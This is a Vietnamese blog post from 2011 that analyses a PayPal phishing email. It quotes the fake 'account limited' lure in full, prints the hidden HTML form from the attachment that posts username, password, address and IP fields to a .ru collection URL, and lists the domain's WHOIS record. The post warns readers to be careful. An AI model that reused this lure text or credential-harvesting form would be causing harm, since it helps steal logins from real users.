08 September 2011

[Phân tích] Mail Phishing paypal

Mở mail thấy có cái mail từ PayPal users@intl187.pays.com ngồi download về chém gió vậy
 Nội dung của nó:
Notification level: Urgent

Dear Valued Member,

Recently, our system detected unusual charges to a credit card linked to your PayPal account.

Access to your account was limited for the following reason:

                 There are activities of which someone tried to access your PayPal account without
your permission. To ensure greater security, we have limited access to your account. We have sent
you an attachment which contains all the necessary steps in order to restore your account access.
Please download and open it in your browser.

(The locator for this reason is PP-575-223-906)

                 We thank you for your prompt attention to this matter. Please understand that this
is a security measure intended to protect you and your account. We apologise for any inconvenience.

Thank you,
PayPal Account Review Department

Sặc mùi :))
Có 2 cái, download về chơi chơi vậy :))
  Giờ, chả biết gà còn nhiều ko nhỉ? :))
Download, View source

Thấy dòng quan trọng nhất :))
<form name="frm" action="http://yqrrhqmqkqqqpbqsrhhllpplhkqsqqabwqqshphlplhplqhlpl.zuprionaskoliliasnoxikcmrnmn.ru/syscall.php" method="post" onsubmit="return validate(this)">
<input type="hidden" id="swich" name="swich" value="0"><input type="hidden" name="user" value=""><input type="hidden" name="pass" value=""><input type="hidden" name="defaultaddress" value=""><input type="hidden" name="ip" value=""><input type="hidden" name="send" value="">
 Lang thang thêm với cái đống GIUN này thì

Network (AS51632 INET iNet Ltd.)
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian) 
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

nserver:    ns1.nameself.com.
nserver:    ns2.nameself.com.
person:     Private Person
e-mail:     contacts@ss.hk
registrar:  REGTIME-REG-RIPN
created:    2011.07.12
paid-till:  2012.07.12
source:     TCI

Last updated on 2011.09.05 19:55:46 MSK/MSD

 Bà con cảnh giác :)). 
Ngoài ra, Bonus cái này


